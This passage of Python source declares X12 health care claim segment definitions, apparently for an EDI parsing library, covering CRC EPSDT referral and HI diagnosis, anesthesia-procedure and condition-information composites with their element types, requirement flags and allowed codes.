req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["75"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["IH"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="EPSDT Referral", position="2200", repeat="1", req_sit="S", syntax="" ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["ZZ"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "HI", Properties( desc="Health Care Diagnosis Code", position="2310", repeat="1", req_sit="R", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABK", "BK"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HI", Properties( desc="Anesthesia Related Procedure", position="2310", repeat="1", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BP"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BO"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="03", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="04", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="06", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="07", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="08", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="09", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="10", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="11", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="12", ), ), ), Segment( "HI", Properties( desc="Condition Information", position="2310", repeat="2", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", 